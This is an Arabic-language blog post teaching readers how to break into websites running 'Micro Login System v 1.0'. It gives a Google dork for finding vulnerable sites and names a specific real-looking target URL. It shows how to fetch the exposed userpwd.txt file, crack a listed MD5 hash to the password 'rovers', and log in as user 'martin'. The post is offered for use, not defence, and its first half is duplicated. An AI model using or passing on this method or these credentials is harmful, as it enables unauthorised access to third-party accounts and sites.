شرح ثغرة
intext:"Micro Login System v 1.0
للاختراق
اولا نروح على جوجل ونكتب
intext:"Micro Login System v 1.0
راح تطلع لنا نتائج ب مواقع
مثلا بدنا هذا الموقع
http://www.accessite.freeola.org/login/login.php
نغير login.php
ل userpwd.txt
بحيث يصير الرابط هكذا
http://www.accessite.freeola.org/login/userpwd.txt
الان ننسخ هذا الرابط
http://www.accessite.freeola.org/login/userpwd.txt
راح يطلع لنا بيانات
للمثال راح اخد اول واحد وهو
intext:"Micro Login System v 1.0
للاختراق
اولا نروح على جوجل ونكتب
intext:"Micro Login System v 1.0
راح تطلع لنا نتائج ب مواقع
مثلا بدنا هذا الموقع
http://www.accessite.freeola.org/login/login.php
نغير login.php
ل userpwd.txt
بحيث يصير الرابط هكذا
http://www.accessite.freeola.org/login/userpwd.txt
الان ننسخ هذا الرابط
http://www.accessite.freeola.org/login/userpwd.txt
راح يطلع لنا بيانات
للمثال راح اخد اول واحد وهو
martin:da1771c415ae1e44e8a774f2e04fdffc
اسم العضو
martinكلمة السر [ولكن مشفرة]da1771c415ae1e44e8a774f2e04fdffcفك تشفير كلمة السر من هذا الموقعhttp://www.hashkiller.co.uk/md5-decrypter.aspxنفك التشفير وطريقة فك التشفير سهله منه1= هنا تكتب كلمة السر المشفرة2= هنا تكتب كود الكابتشا المطلوب كتابته3= تكبس هنا4= هذا هو الكود تم فك تشفيره وكلمة السر هي [rovers]الان نجرب نسجل دخولنا بالبيانات الي اخرجناهااسم العضوmartinوكلمة السر.rovers----------تم تسجيل الدخول بنجااااااااااحكان معكم مدير مدونة الامن المعلوماتيhttp://amnma3.blogspot.com
أزال المؤلف هذا التعليق.
ردحذف